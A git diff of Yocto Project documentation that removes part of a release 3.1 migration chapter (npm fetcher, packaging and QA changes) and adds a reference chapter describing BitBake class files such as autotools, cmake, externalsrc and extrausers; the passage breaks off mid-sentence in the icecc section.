- Previously, recipes by tradition included both SHA256 and MD5 checksums for remotely fetched files in <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>, even though only one is actually mandated. However, the MD5 checksum does not add much given its inherent weakness; thus when a checksum fails only the SHA256 sum will now be printed. The md5sum will still be verified if it is specified.
- </para>
- </section>
-
-
- <section id='migration-3.1-npm'>
- <title>npm fetcher changes</title>
-
- <para>
- The npm fetcher has been completely reworked in this release. The npm fetcher now only fetches the package source itself and no longer the dependencies; there is now also an npmsw fetcher which explicitly fetches the shrinkwrap file and the dependencies. This removes the slightly awkward <filename>NPM_LOCKDOWN</filename> and <filename>NPM_SHRINKWRAP</filename> variables which pointed to local files; the lockdown file is no longer needed at all. Additionally, the package name in <filename>npm://</filename> entries in <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link> is now specified using a <filename>package</filename> parameter instead of the earlier <filename>name</filename> which overlapped with the generic <filename>name</filename> parameter. All recipes using the npm fetcher will need to be changed as a result.
- </para>
- <para>
- An example of the new scheme:
- <literallayout class='monospaced'>
-SRC_URI = "npm://registry.npmjs.org;package=array-flatten;version=1.1.1 \
- npmsw://${THISDIR}/npm-shrinkwrap.json"
- </literallayout>
- Another example where the sources are fetched from git rather than an npm repository:
- <literallayout class='monospaced'>
-SRC_URI = "git://github.com/foo/bar.git;protocol=https \
- npmsw://${THISDIR}/npm-shrinkwrap.json"
- </literallayout>
- </para>
- <para>
- devtool and recipetool have also been updated to match with the npm fetcher changes. Other than producing working and more complete recipes for npm sources, there is also a minor change to the command line for devtool: the <filename>--fetch-dev</filename> option has been renamed to <filename>--npm-dev</filename> as it is npm-specific.
- </para>
- </section>
-
-
- <section id='migration-3.1-packaging-changes'>
- <title>Packaging changes</title>
-
- <para>
- <itemizedlist>
- <listitem><para><filename>intltool</filename> has been removed from <filename>packagegroup-core-sdk</filename> as it is rarely needed to build modern software - gettext can do most of the things it used to be needed for. <filename>intltool</filename> has also been removed from <filename>packagegroup-core-self-hosted</filename> as it is not needed to for standard builds.</para></listitem>
- <listitem><para>git: <filename>git-am</filename>, <filename>git-difftool</filename>, <filename>git-submodule</filename>, and <filename>git-request-pull</filename> are no longer perl-based, so are now installed with the main <filename>git</filename> package instead of within <filename>git-perltools</filename>.</para></listitem>
- <listitem><para>The <filename>ldconfig</filename> binary built as part of glibc has now been moved to its own <filename>ldconfig</filename> package (note no <filename>glibc-</filename> prefix). This package is in the <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link> of the main <filename>glibc</filename> package if <filename>ldconfig</filename> is present in <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.</para></listitem>
- <listitem><para><filename>libevent</filename> now splits each shared library into its own package (as Debian does). Since these are shared libraries and will be pulled in through the normal shared library dependency handling, there should be no impact to existing configurations other than less unnecessary libraries being installed in some cases.</para></listitem>
- <listitem><para>linux-firmware now has a new package for <filename>bcm4366c</filename> and includes available NVRAM config files into the <filename>bcm43340</filename>, <filename>bcm43362</filename>, <filename>bcm43430</filename> and <filename>bcm4356-pcie</filename> packages.</para></listitem>
- <listitem><para><filename>harfbuzz</filename> now splits the new <filename>libharfbuzz-subset.so</filename> library into its own package to reduce the main package size in cases where <filename>libharfbuzz-subset.so</filename> is not needed.</para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-3.1-package-qa-warnings'>
- <title>Additional warnings</title>
-
- <para>
- Warnings will now be shown at <filename>do_package_qa</filename> time in the following circumstances:
-
- <itemizedlist>
- <listitem><para>A recipe installs <filename>.desktop</filename> files containing <filename>MimeType</filename> keys but does not inherit the new <filename>mime-xdg</filename> class</para></listitem>
- <listitem><para>A recipe installs <filename>.xml</filename> files into <filename>${datadir}/mime/packages</filename> but does not inherit the <filename>mime</filename> class</para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-3.1-x86-live-wic'>
- <title><filename>wic</filename> image type now used instead of <filename>live</filename> by default for x86</title>
-
- <para>
- <filename>conf/machine/include/x86-base.inc</filename> (inherited by most x86 machine configurations) now specifies <filename>wic</filename> instead of <filename>live</filename> by default in <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>. The <filename>live</filename> image type will likely be removed in a future release so it is recommended that you use <filename>wic</filename> instead.
- </para>
- </section>
-
- <section id='migration-3.1-misc'>
- <title>Miscellaneous changes</title>
-
- <para>
- <itemizedlist>
- <listitem><para>The undocumented <filename>SRC_DISTRIBUTE_LICENSES</filename> variable has now been removed in favour of a new <filename>AVAILABLE_LICENSES</filename> variable which is dynamically set based upon license files found in <filename>${COMMON_LICENSE_DIR}</filename> and <filename>${LICENSE_PATH}</filename>.</para></listitem>
- <listitem><para>The tune definition for big-endian microblaze machines is now <filename>microblaze</filename> instead of <filename>microblazeeb</filename>.</para></listitem>
- <listitem><para><filename>newlib</filename> no longer has built-in syscalls. <filename>libgloss</filename> should then provide the syscalls, <filename>crt0.o</filename> and other functions that are no longer part of <filename>newlib</filename> itself. If you are using <filename>TCLIBC = "newlib"</filename> this now means that you must link applications with both <filename>newlib</filename> and <filename>libgloss</filename>, whereas before <filename>newlib</filename> would run in many configurations by itself.</para></listitem>
- </itemizedlist>
- </para>
- </section>
-
-</section>
-
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-classes.rst b/documentation/ref-manual/ref-classes.rst
new file mode 100644
index 0000000000..dea27eea88
--- /dev/null
+++ b/documentation/ref-manual/ref-classes.rst
@@ -0,0 +1,2899 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*******
+Classes
+*******
+
+Class files are used to abstract common functionality and share it
+amongst multiple recipe (``.bb``) files. To use a class file, you simply
+make sure the recipe inherits the class. In most cases, when a recipe
+inherits a class it is enough to enable its features. There are cases,
+however, where in the recipe you might need to set variables or override
+some default behavior.
+
+Any :term:`Metadata` usually found in a recipe can also be
+placed in a class file. Class files are identified by the extension
+``.bbclass`` and are usually placed in a ``classes/`` directory beneath
+the ``meta*/`` directory found in the :term:`Source Directory`.
+Class files can also be pointed to by
+:term:`BUILDDIR` (e.g. ``build/``) in the same way as
+``.conf`` files in the ``conf`` directory. Class files are searched for
+in :term:`BBPATH` using the same method by which ``.conf``
+files are searched.
+
+This chapter discusses only the most useful and important classes. Other
+classes do exist within the ``meta/classes`` directory in the Source
+Directory. You can reference the ``.bbclass`` files directly for more
+information.
+
+.. _ref-classes-allarch:
+
+``allarch.bbclass``
+===================
+
+The ``allarch`` class is inherited by recipes that do not produce
+architecture-specific output. The class disables functionality that is
+normally needed for recipes that produce executable binaries (such as
+building the cross-compiler and a C library as pre-requisites, and
+splitting out of debug symbols during packaging).
+
+.. note::
+
+ Unlike some distro recipes (e.g. Debian), OpenEmbedded recipes that
+ produce packages that depend on tunings through use of the
+ :term:`RDEPENDS` and
+ :term:`TUNE_PKGARCH` variables, should never be
+ configured for all architectures using ``allarch``. This is the case
+ even if the recipes do not produce architecture-specific output.
+
+ Configuring such recipes for all architectures causes the
+ ``do_package_write_*`` tasks to
+ have different signatures for the machines with different tunings.
+ Additionally, unnecessary rebuilds occur every time an image for a
+ different ``MACHINE`` is built even when the recipe never changes.
+
+By default, all recipes inherit the :ref:`base <ref-classes-base>` and
+:ref:`package <ref-classes-package>` classes, which enable
+functionality needed for recipes that produce executable output. If your
+recipe, for example, only produces packages that contain configuration
+files, media files, or scripts (e.g. Python and Perl), then it should
+inherit the ``allarch`` class.
+
+.. _ref-classes-archiver:
+
+``archiver.bbclass``
+====================
+
+The ``archiver`` class supports releasing source code and other
+materials with the binaries.
+
+For more details on the source archiver, see the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining open source license compliance during your product's lifecycle`"
+section in the Yocto Project Development Tasks Manual. You can also see
+the :term:`ARCHIVER_MODE` variable for information
+about the variable flags (varflags) that help control archive creation.
+
+.. _ref-classes-autotools:
+
+``autotools*.bbclass``
+======================
+
+The ``autotools*`` classes support Autotooled packages.
+
+The ``autoconf``, ``automake``, and ``libtool`` packages bring
+standardization. This class defines a set of tasks (e.g. ``configure``,
+``compile`` and so forth) that work for all Autotooled packages. It
+should usually be enough to define a few standard variables and then
+simply ``inherit autotools``. These classes can also work with software
+that emulates Autotools. For more information, see the
+":ref:`new-recipe-autotooled-package`" section
+in the Yocto Project Development Tasks Manual.
+
+By default, the ``autotools*`` classes use out-of-tree builds (i.e.
+``autotools.bbclass`` building with ``B != S``).
+
+If the software being built by a recipe does not support using
+out-of-tree builds, you should have the recipe inherit the
+``autotools-brokensep`` class. The ``autotools-brokensep`` class behaves
+the same as the ``autotools`` class but builds with :term:`B`
+== :term:`S`. This method is useful when out-of-tree build
+support is either not present or is broken.
+
+.. note::
+
+ It is recommended that out-of-tree support be fixed and used if at
+ all possible.
+
+It's useful to have some idea of how the tasks defined by the
+``autotools*`` classes work and what they do behind the scenes.
+
+- :ref:`ref-tasks-configure` - Regenerates the
+ configure script (using ``autoreconf``) and then launches it with a
+ standard set of arguments used during cross-compilation. You can pass
+ additional parameters to ``configure`` through the ``EXTRA_OECONF``
+ or :term:`PACKAGECONFIG_CONFARGS`
+ variables.
+
+- :ref:`ref-tasks-compile` - Runs ``make`` with
+ arguments that specify the compiler and linker. You can pass
+ additional arguments through the ``EXTRA_OEMAKE`` variable.
+
+- :ref:`ref-tasks-install` - Runs ``make install`` and
+ passes in ``${``\ :term:`D`\ ``}`` as ``DESTDIR``.
+
+.. _ref-classes-base:
+
+``base.bbclass``
+================
+
+The ``base`` class is special in that every ``.bb`` file implicitly
+inherits the class. This class contains definitions for standard basic
+tasks such as fetching, unpacking, configuring (empty by default),
+compiling (runs any ``Makefile`` present), installing (empty by default)
+and packaging (empty by default). These classes are often overridden or
+extended by other classes such as the
+:ref:`autotools <ref-classes-autotools>` class or the
+:ref:`package <ref-classes-package>` class.
+
+The class also contains some commonly used functions such as
+``oe_runmake``, which runs ``make`` with the arguments specified in
+:term:`EXTRA_OEMAKE` variable as well as the
+arguments passed directly to ``oe_runmake``.
+
+.. _ref-classes-bash-completion:
+
+``bash-completion.bbclass``
+===========================
+
+Sets up packaging and dependencies appropriate for recipes that build
+software that includes bash-completion data.
+
+.. _ref-classes-bin-package:
+
+``bin_package.bbclass``
+=======================
+
+The ``bin_package`` class is a helper class for recipes that extract the
+contents of a binary package (e.g. an RPM) and install those contents
+rather than building the binary from source. The binary package is
+extracted and new packages in the configured output package format are
+created. Extraction and installation of proprietary binaries is a good
+example use for this class.
+
+.. note::
+
+ For RPMs and other packages that do not contain a subdirectory, you
+ should specify an appropriate fetcher parameter to point to the
+ subdirectory. For example, if BitBake is using the Git fetcher (``git://``),
+ the "subpath" parameter limits the checkout to a specific subpath
+ of the tree. Here is an example where ``${BP}`` is used so that the files
+ are extracted into the subdirectory expected by the default value of
+ ``S``:
+ ::
+
+ SRC_URI = "git://example.com/downloads/somepackage.rpm;subpath=${BP}"
+
+
+ See the ":ref:`bitbake-user-manual/bitbake-user-manual-fetching:fetchers`" section in the BitBake User Manual for
+ more information on supported BitBake Fetchers.
+
+.. _ref-classes-binconfig:
+
+``binconfig.bbclass``
+=====================
+
+The ``binconfig`` class helps to correct paths in shell scripts.
+
+Before ``pkg-config`` had become widespread, libraries shipped shell
+scripts to give information about the libraries and include paths needed
+to build software (usually named ``LIBNAME-config``). This class assists
+any recipe using such scripts.
+
+During staging, the OpenEmbedded build system installs such scripts into
+the ``sysroots/`` directory. Inheriting this class results in all paths
+in these scripts being changed to point into the ``sysroots/`` directory
+so that all builds that use the script use the correct directories for
+the cross compiling layout. See the
+:term:`BINCONFIG_GLOB` variable for more
+information.
+
+.. _ref-classes-binconfig-disabled:
+
+``binconfig-disabled.bbclass``
+==============================
+
+An alternative version of the :ref:`binconfig <ref-classes-binconfig>`
+class, which disables binary configuration scripts by making them return
+an error in favor of using ``pkg-config`` to query the information. The
+scripts to be disabled should be specified using the
+:term:`BINCONFIG` variable within the recipe inheriting
+the class.
+
+.. _ref-classes-blacklist:
+
+``blacklist.bbclass``
+=====================
+
+The ``blacklist`` class prevents the OpenEmbedded build system from
+building specific recipes (blacklists them). To use this class, inherit
+the class globally and set :term:`PNBLACKLIST` for
+each recipe you wish to blacklist. Specify the :term:`PN`
+value as a variable flag (varflag) and provide a reason, which is
+reported, if the package is requested to be built as the value. For
+example, if you want to blacklist a recipe called "exoticware", you add
+the following to your ``local.conf`` or distribution configuration:
+::
+
+ INHERIT += "blacklist"
+ PNBLACKLIST[exoticware] = "Not supported by our organization."
+
+.. _ref-classes-buildhistory:
+
+``buildhistory.bbclass``
+========================
+
+The ``buildhistory`` class records a history of build output metadata,
+which can be used to detect possible regressions as well as used for
+analysis of the build output. For more information on using Build
+History, see the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining build output quality`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-classes-buildstats:
+
+``buildstats.bbclass``
+======================
+
+The ``buildstats`` class records performance statistics about each task
+executed during the build (e.g. elapsed time, CPU usage, and I/O usage).
+
+When you use this class, the output goes into the
+:term:`BUILDSTATS_BASE` directory, which defaults
+to ``${TMPDIR}/buildstats/``. You can analyze the elapsed time using
+``scripts/pybootchartgui/pybootchartgui.py``, which produces a cascading
+chart of the entire build process and can be useful for highlighting
+bottlenecks.
+
+Collecting build statistics is enabled by default through the
+:term:`USER_CLASSES` variable from your
+``local.conf`` file. Consequently, you do not have to do anything to
+enable the class. However, if you want to disable the class, simply
+remove "buildstats" from the ``USER_CLASSES`` list.
+
+.. _ref-classes-buildstats-summary:
+
+``buildstats-summary.bbclass``
+==============================
+
+When inherited globally, prints statistics at the end of the build on
+sstate re-use. In order to function, this class requires the
+:ref:`buildstats <ref-classes-buildstats>` class be enabled.
+
+.. _ref-classes-ccache:
+
+``ccache.bbclass``
+==================
+
+The ``ccache`` class enables the C/C++ Compiler Cache for the build.
+This class is used to give a minor performance boost during the build.
+However, using the class can lead to unexpected side-effects. Thus, it
+is recommended that you do not use this class. See
+http://ccache.samba.org/ for information on the C/C++ Compiler
+Cache.
+
+.. _ref-classes-chrpath:
+
+``chrpath.bbclass``
+===================
+
+The ``chrpath`` class is a wrapper around the "chrpath" utility, which
+is used during the build process for ``nativesdk``, ``cross``, and
+``cross-canadian`` recipes to change ``RPATH`` records within binaries
+in order to make them relocatable.
+
+.. _ref-classes-clutter:
+
+``clutter.bbclass``
+===================
+
+The ``clutter`` class consolidates the major and minor version naming
+and other common items used by Clutter and related recipes.
+
+.. note::
+
+ Unlike some other classes related to specific libraries, recipes
+ building other software that uses Clutter do not need to inherit this
+ class unless they use the same recipe versioning scheme that the
+ Clutter and related recipes do.
+
+.. _ref-classes-cmake:
+
+``cmake.bbclass``
+=================
+
+The ``cmake`` class allows for recipes that need to build software using
+the `CMake <https://cmake.org/overview/>`__ build system. You can use
+the :term:`EXTRA_OECMAKE` variable to specify
+additional configuration options to be passed using the ``cmake``
+command line.
+
+On the occasion that you would be installing custom CMake toolchain
+files supplied by the application being built, you should install them
+to the preferred CMake Module directory: ``${D}${datadir}/cmake/``
+Modules during
+:ref:`ref-tasks-install`.
+
+.. _ref-classes-cml1:
+
+``cml1.bbclass``
+================
+
+The ``cml1`` class provides basic support for the Linux kernel style
+build configuration system.
+
+.. _ref-classes-compress_doc:
+
+``compress_doc.bbclass``
+========================
+
+Enables compression for man pages and info pages. This class is intended
+to be inherited globally. The default compression mechanism is gz (gzip)
+but you can select an alternative mechanism by setting the
+:term:`DOC_COMPRESS` variable.
+
+.. _ref-classes-copyleft_compliance:
+
+``copyleft_compliance.bbclass``
+===============================
+
+The ``copyleft_compliance`` class preserves source code for the purposes
+of license compliance. This class is an alternative to the ``archiver``
+class and is still used by some users even though it has been deprecated
+in favor of the :ref:`archiver <ref-classes-archiver>` class.
+
+.. _ref-classes-copyleft_filter:
+
+``copyleft_filter.bbclass``
+===========================
+
+A class used by the :ref:`archiver <ref-classes-archiver>` and
+:ref:`copyleft_compliance <ref-classes-copyleft_compliance>` classes
+for filtering licenses. The ``copyleft_filter`` class is an internal
+class and is not intended to be used directly.
+
+.. _ref-classes-core-image:
+
+``core-image.bbclass``
+======================
+
+The ``core-image`` class provides common definitions for the
+``core-image-*`` image recipes, such as support for additional
+:term:`IMAGE_FEATURES`.
+
+.. _ref-classes-cpan:
+
+``cpan*.bbclass``
+=================
+
+The ``cpan*`` classes support Perl modules.
+
+Recipes for Perl modules are simple. These recipes usually only need to
+point to the source's archive and then inherit the proper class file.
+Building is split into two methods depending on which method the module
+authors used.
+
+- Modules that use old ``Makefile.PL``-based build system require
+ ``cpan.bbclass`` in their recipes.
+
+- Modules that use ``Build.PL``-based build system require using
+ ``cpan_build.bbclass`` in their recipes.
+
+Both build methods inherit the ``cpan-base`` class for basic Perl
+support.
+
+.. _ref-classes-cross:
+
+``cross.bbclass``
+=================
+
+The ``cross`` class provides support for the recipes that build the
+cross-compilation tools.
+
+.. _ref-classes-cross-canadian:
+
+``cross-canadian.bbclass``
+==========================
+
+The ``cross-canadian`` class provides support for the recipes that build
+the Canadian Cross-compilation tools for SDKs. See the
+":ref:`overview-manual/overview-manual-concepts:cross-development toolchain generation`"
+section in the Yocto Project Overview and Concepts Manual for more
+discussion on these cross-compilation tools.
+
+.. _ref-classes-crosssdk:
+
+``crosssdk.bbclass``
+====================
+
+The ``crosssdk`` class provides support for the recipes that build the
+cross-compilation tools used for building SDKs. See the
+":ref:`overview-manual/overview-manual-concepts:cross-development toolchain generation`"
+section in the Yocto Project Overview and Concepts Manual for more
+discussion on these cross-compilation tools.
+
+.. _ref-classes-debian:
+
+``debian.bbclass``
+==================
+
+The ``debian`` class renames output packages so that they follow the
+Debian naming policy (i.e. ``glibc`` becomes ``libc6`` and
+``glibc-devel`` becomes ``libc6-dev``.) Renaming includes the library
+name and version as part of the package name.
+
+If a recipe creates packages for multiple libraries (shared object files
+of ``.so`` type), use the :term:`LEAD_SONAME`
+variable in the recipe to specify the library on which to apply the
+naming scheme.
+
+.. _ref-classes-deploy:
+
+``deploy.bbclass``
+==================
+
+The ``deploy`` class handles deploying files to the
+:term:`DEPLOY_DIR_IMAGE` directory. The main
+function of this class is to allow the deploy step to be accelerated by
+shared state. Recipes that inherit this class should define their own
+:ref:`ref-tasks-deploy` function to copy the files to be
+deployed to :term:`DEPLOYDIR`, and use ``addtask`` to
+add the task at the appropriate place, which is usually after
+:ref:`ref-tasks-compile` or
+:ref:`ref-tasks-install`. The class then takes care of
+staging the files from ``DEPLOYDIR`` to ``DEPLOY_DIR_IMAGE``.
+
+.. _ref-classes-devshell:
+
+``devshell.bbclass``
+====================
+
+The ``devshell`` class adds the ``do_devshell`` task. Distribution
+policy dictates whether to include this class. See the ":ref:`platdev-appdev-devshell`"
+section in the Yocto Project Development Tasks Manual for more
+information about using ``devshell``.
+
+.. _ref-classes-devupstream:
+
+``devupstream.bbclass``
+=======================
+
+The ``devupstream`` class uses
+:term:`BBCLASSEXTEND` to add a variant of the
+recipe that fetches from an alternative URI (e.g. Git) instead of a
+tarball. Following is an example:
+::
+
+ BBCLASSEXTEND = "devupstream:target"
+ SRC_URI_class-devupstream = "git://git.example.com/example"
+ SRCREV_class-devupstream = "abcd1234"
+
+Adding the above statements to your recipe creates a variant that has
+:term:`DEFAULT_PREFERENCE` set to "-1".
+Consequently, you need to select the variant of the recipe to use it.
+Any development-specific adjustments can be done by using the
+``class-devupstream`` override. Here is an example:
+::
+
+ DEPENDS_append_class-devupstream = " gperf-native"
+ do_configure_prepend_class-devupstream() {
+ touch ${S}/README
+ }
+
+The class
+currently only supports creating a development variant of the target
+recipe, not ``native`` or ``nativesdk`` variants.
+
+The ``BBCLASSEXTEND`` syntax (i.e. ``devupstream:target``) provides
+support for ``native`` and ``nativesdk`` variants. Consequently, this
+functionality can be added in a future release.
+
+Support for other version control systems such as Subversion is limited
+due to BitBake's automatic fetch dependencies (e.g.
+``subversion-native``).
+
+.. _ref-classes-distutils:
+
+``distutils*.bbclass``
+======================
+
+The ``distutils*`` classes support recipes for Python version 2.x
+extensions, which are simple. These recipes usually only need to point
+to the source's archive and then inherit the proper class. Building is
+split into two methods depending on which method the module authors
+used.
+
+- Extensions that use an Autotools-based build system require Autotools
+ and the classes based on ``distutils`` in their recipes.
+
+- Extensions that use build systems based on ``distutils`` require the
+ ``distutils`` class in their recipes.
+
+- Extensions that use build systems based on ``setuptools`` require the
+ :ref:`setuptools <ref-classes-setuptools>` class in their recipes.
+
+The ``distutils-common-base`` class is required by some of the
+``distutils*`` classes to provide common Python2 support.
+
+.. _ref-classes-distutils3:
+
+``distutils3*.bbclass``
+=======================
+
+The ``distutils3*`` classes support recipes for Python version 3.x
+extensions, which are simple. These recipes usually only need to point
+to the source's archive and then inherit the proper class. Building is
+split into three methods depending on which method the module authors
+used.
+
+- Extensions that use an Autotools-based build system require Autotools
+ and ``distutils``-based classes in their recipes.
+
+- Extensions that use ``distutils``-based build systems require the
+ ``distutils`` class in their recipes.
+
+- Extensions that use build systems based on ``setuptools3`` require
+ the :ref:`setuptools3 <ref-classes-setuptools>` class in their
+ recipes.
+
+The ``distutils3*`` classes either inherit their corresponding
+``distutils*`` class or replicate them using a Python3 version instead
+(e.g. ``distutils3-base`` inherits ``distutils-common-base``, which is
+the same as ``distutils-base`` but inherits ``python3native`` instead of
+``pythonnative``).
+
+.. _ref-classes-externalsrc:
+
+``externalsrc.bbclass``
+=======================
+
+The ``externalsrc`` class supports building software from source code
+that is external to the OpenEmbedded build system. Building software
+from an external source tree means that the build system's normal fetch,
+unpack, and patch process is not used.
+
+By default, the OpenEmbedded build system uses the :term:`S`
+and :term:`B` variables to locate unpacked recipe source code
+and to build it, respectively. When your recipe inherits the
+``externalsrc`` class, you use the
+:term:`EXTERNALSRC` and
+:term:`EXTERNALSRC_BUILD` variables to
+ultimately define ``S`` and ``B``.
+
+By default, this class expects the source code to support recipe builds
+that use the :term:`B` variable to point to the directory in
+which the OpenEmbedded build system places the generated objects built
+from the recipes. By default, the ``B`` directory is set to the
+following, which is separate from the source directory (``S``):
+::
+
+ ${WORKDIR}/${BPN}/{PV}/
+
+See these variables for more information:
+:term:`WORKDIR`, :term:`BPN`, and
+:term:`PV`,
+
+For more information on the ``externalsrc`` class, see the comments in
+``meta/classes/externalsrc.bbclass`` in the :term:`Source Directory`.
+For information on how to use the
+``externalsrc`` class, see the
+":ref:`dev-manual/dev-manual-common-tasks:building software from an external source`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-classes-extrausers:
+
+``extrausers.bbclass``
+======================
+
+The ``extrausers`` class allows additional user and group configuration
+to be applied at the image level. Inheriting this class either globally
+or from an image recipe allows additional user and group operations to
+be performed using the
+:term:`EXTRA_USERS_PARAMS` variable.
+
+.. note::
+
+ The user and group operations added using the
+ extrausers
+ class are not tied to a specific recipe outside of the recipe for the
+ image. Thus, the operations can be performed across the image as a
+ whole. Use the
+ useradd
+ class to add user and group configuration to a specific recipe.
+
+Here is an example that uses this class in an image recipe:
+::
+
+ inherit extrausers
+ EXTRA_USERS_PARAMS = "\
+ useradd -p '' tester; \
+ groupadd developers; \
+ userdel nobody; \
+ groupdel -g video; \
+ groupmod -g 1020 developers; \
+ usermod -s /bin/sh tester; \
+ "
+
+Here is an example that adds two users named "tester-jim" and "tester-sue" and assigns
+passwords:
+::
+
+ inherit extrausers
+ EXTRA_USERS_PARAMS = "\
+ useradd -P tester01 tester-jim; \
+ useradd -P tester01 tester-sue; \
+ "
+
+Finally, here is an example that sets the root password to "1876*18":
+::
+
+ inherit extrausers
+ EXTRA_USERS_PARAMS = "\
+ usermod -P 1876*18 root; \
+ "
+
+.. _ref-classes-features_check:
+
+``features_check.bbclass``
+=================================
+
+The ``features_check`` class allows individual recipes to check
+for required and conflicting
+:term:`DISTRO_FEATURES`, :term:`MACHINE_FEATURES` or :term:`COMBINED_FEATURES`.
+
+This class provides support for the following variables:
+
+- :term:`REQUIRED_DISTRO_FEATURES`
+- :term:`CONFLICT_DISTRO_FEATURES`
+- :term:`ANY_OF_DISTRO_FEATURES`
+- ``REQUIRED_MACHINE_FEATURES``
+- ``CONFLICT_MACHINE_FEATURES``
+- ``ANY_OF_MACHINE_FEATURES``
+- ``REQUIRED_COMBINED_FEATURES``
+- ``CONFLICT_COMBINED_FEATURES``
+- ``ANY_OF_COMBINED_FEATURES``
+
+If any conditions specified in the recipe using the above
+variables are not met, the recipe will be skipped, and if the
+build system attempts to build the recipe then an error will be
+triggered.
+
+.. _ref-classes-fontcache:
+
+``fontcache.bbclass``
+=====================
+
+The ``fontcache`` class generates the proper post-install and
+post-remove (postinst and postrm) scriptlets for font packages. These
+scriptlets call ``fc-cache`` (part of ``Fontconfig``) to add the fonts
+to the font information cache. Since the cache files are
+architecture-specific, ``fc-cache`` runs using QEMU if the postinst
+scriptlets need to be run on the build host during image creation.
+
+If the fonts being installed are in packages other than the main
+package, set :term:`FONT_PACKAGES` to specify the
+packages containing the fonts.
+
+.. _ref-classes-fs-uuid:
+
+``fs-uuid.bbclass``
+===================
+
+The ``fs-uuid`` class extracts UUID from
+``${``\ :term:`ROOTFS`\ ``}``, which must have been built
+by the time that this function gets called. The ``fs-uuid`` class only
+works on ``ext`` file systems and depends on ``tune2fs``.
+
+.. _ref-classes-gconf:
+
+``gconf.bbclass``
+=================
+
+The ``gconf`` class provides common functionality for recipes that need
+to install GConf schemas. The schemas will be put into a separate
+package (``${``\ :term:`PN`\ ``}-gconf``) that is created
+automatically when this class is inherited. This package uses the
+appropriate post-install and post-remove (postinst/postrm) scriptlets to
+register and unregister the schemas in the target image.
+
+.. _ref-classes-gettext:
+
+``gettext.bbclass``
+===================
+
+The ``gettext`` class provides support for building software that uses
+the GNU ``gettext`` internationalization and localization system. All
+recipes building software that use ``gettext`` should inherit this
+class.
+
+.. _ref-classes-gnomebase:
+
+``gnomebase.bbclass``
+=====================
+
+The ``gnomebase`` class is the base class for recipes that build
+software from the GNOME stack. This class sets
+:term:`SRC_URI` to download the source from the GNOME
+mirrors as well as extending :term:`FILES` with the typical
+GNOME installation paths.
+
+.. _ref-classes-gobject-introspection:
+
+``gobject-introspection.bbclass``
+=================================
+
+Provides support for recipes building software that supports GObject
+introspection. This functionality is only enabled if the
+"gobject-introspection-data" feature is in
+:term:`DISTRO_FEATURES` as well as
+"qemu-usermode" being in
+:term:`MACHINE_FEATURES`.
+
+.. note::
+
+ This functionality is backfilled by default and, if not applicable,
+ should be disabled through ``DISTRO_FEATURES_BACKFILL_CONSIDERED`` or
+ ``MACHINE_FEATURES_BACKFILL_CONSIDERED``, respectively.
+
+.. _ref-classes-grub-efi:
+
+``grub-efi.bbclass``
+====================
+
+The ``grub-efi`` class provides ``grub-efi``-specific functions for
+building bootable images.
+
+This class supports several variables:
+
+- :term:`INITRD`: Indicates list of filesystem images to
+ concatenate and use as an initial RAM disk (initrd) (optional).
+
+- :term:`ROOTFS`: Indicates a filesystem image to include
+ as the root filesystem (optional).
+
+- :term:`GRUB_GFXSERIAL`: Set this to "1" to have
+ graphics and serial in the boot menu.
+
+- :term:`LABELS`: A list of targets for the automatic
+ configuration.
+
+- :term:`APPEND`: An override list of append strings for
+ each ``LABEL``.
+
+- :term:`GRUB_OPTS`: Additional options to add to the
+ configuration (optional). Options are delimited using semi-colon
+ characters (``;``).
+
+- :term:`GRUB_TIMEOUT`: Timeout before executing
+ the default ``LABEL`` (optional).
+
+.. _ref-classes-gsettings:
+
+``gsettings.bbclass``
+=====================
+
+The ``gsettings`` class provides common functionality for recipes that
+need to install GSettings (glib) schemas. The schemas are assumed to be
+part of the main package. Appropriate post-install and post-remove
+(postinst/postrm) scriptlets are added to register and unregister the
+schemas in the target image.
+
+.. _ref-classes-gtk-doc:
+
+``gtk-doc.bbclass``
+===================
+
+The ``gtk-doc`` class is a helper class to pull in the appropriate
+``gtk-doc`` dependencies and disable ``gtk-doc``.
+
+.. _ref-classes-gtk-icon-cache:
+
+``gtk-icon-cache.bbclass``
+==========================
+
+The ``gtk-icon-cache`` class generates the proper post-install and
+post-remove (postinst/postrm) scriptlets for packages that use GTK+ and
+install icons. These scriptlets call ``gtk-update-icon-cache`` to add
+the fonts to GTK+'s icon cache. Since the cache files are
+architecture-specific, ``gtk-update-icon-cache`` is run using QEMU if
+the postinst scriptlets need to be run on the build host during image
+creation.
+
+.. _ref-classes-gtk-immodules-cache:
+
+``gtk-immodules-cache.bbclass``
+===============================
+
+The ``gtk-immodules-cache`` class generates the proper post-install and
+post-remove (postinst/postrm) scriptlets for packages that install GTK+
+input method modules for virtual keyboards. These scriptlets call
+``gtk-update-icon-cache`` to add the input method modules to the cache.
+Since the cache files are architecture-specific,
+``gtk-update-icon-cache`` is run using QEMU if the postinst scriptlets
+need to be run on the build host during image creation.
+
+If the input method modules being installed are in packages other than
+the main package, set
+:term:`GTKIMMODULES_PACKAGES` to specify
+the packages containing the modules.
+
+.. _ref-classes-gzipnative:
+
+``gzipnative.bbclass``
+======================
+
+The ``gzipnative`` class enables the use of different native versions of
+``gzip`` and ``pigz`` rather than the versions of these tools from the
+build host.
+
+.. _ref-classes-icecc:
+
+``icecc.bbclass``
+=================
+
+The ``icecc`` class supports
+`Icecream <https://github.com/icecc/icecream>`__, which facilitates
+taking compile jobs and distributing them among remote machines.
+
+The class stages directories with symlinks from ``gcc`` and ``g++`` to
+``icecc``, for both native and cross compilers. Depending on each
+configure or compile, the OpenEmbedded build system adds the directories
+at the head of the ``PATH`` list and then sets the ``ICECC_CXX`` and
+``ICEC_CC`` variables, which are the paths to the ``g++`` and ``gcc``
+compilers, respectively.
+
+For the cross compiler, the class creates a ``tar.gz`` file that
+contains the Yocto Project toolchain and sets ``ICECC_VERSION``, which
